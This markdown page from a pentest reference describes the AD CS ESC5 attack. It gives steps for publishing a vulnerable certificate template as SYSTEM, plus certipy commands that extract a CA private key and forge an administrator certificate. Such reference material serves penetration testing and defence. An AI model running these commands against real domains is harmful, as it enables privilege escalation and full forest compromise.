ad-adcs-esc05.md (2210B)
1 --- 2 title: "Active Directory - Certificate ESC5" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/ad-adcs-esc05.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/ad-adcs-esc05.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Active Directory - Certificate ESC5 12 13 ## ESC5 - Vulnerable PKI Object Access Control 14 15 > Escalate the privileges from **Domain Administrator** in the child domain into **Enterprise Administrator** at the forest root. 16 17 **Requirements**: 18 19 * Add new templates to the "Certificate" Templates container 20 * "WRITE" access to the `pKIEnrollmentService` object 21 22 **Exploitation - Access Control**: 23 24 * Use `PsExec` to launch `mmc` as SYSTEM on the child DC: `psexec.exe /accepteula -i -s mmc` 25 * Connect to "Configuration naming context" > "Certificate Template" container 26 * Open `certsrv.msc` as SYSTEM and duplicate an existing template 27 * Edit the properties of the template to: 28 * Granting enroll rights to a principal we control in the child domain. 29 * Including Client Authentication in the Application Policies. 30 * Allowing SANs in certificate requests. 31 * Not enabling manager approval or authorized signatures. 32 * Publish the certificate template to the CA 33 * Publish by adding the template to the list in `certificateTemplate` property of `CN=Services`>`CN=Public Key Services`>`CN=Enrollment Services`>`pkiEnrollmentService` 34 * Finally use the ESC1 vulnerability introduced in the duplicated template to issue a certificate impersonating an Enterprise Administrator. 35 36 **Exploitation - Golden Certificate**: 37 38 Use `certipy`to extract the CA certificate and private key 39 40 ```ps1 41 certipy ca -backup -u user@domain.local -p password -dc-ip 10.10.10.10 -ca 'DOMAIN-CA' -target 10.10.10.11 -debug 42 ``` 43 44 Then forge a domain admin certificate 45 46 ```ps1 47 certipy forge -ca-pfx 'DOMAIN-CA.pfx' -upn administrator@domain.local 48 ``` 49 50 ## References 51 52 * [From DA to EA with ESC5 - Andy Robbins - May 16, 2023](https://posts.specterops.io/from-da-to-ea-with-esc5-f9f045aa105c) 53 * [GOAD - part 14 - ADCS 5/7/9/10/11/13/14/15 - Mayfly - March 10, 2025](https://mayfly277.github.io/posts/ADCS-part14/)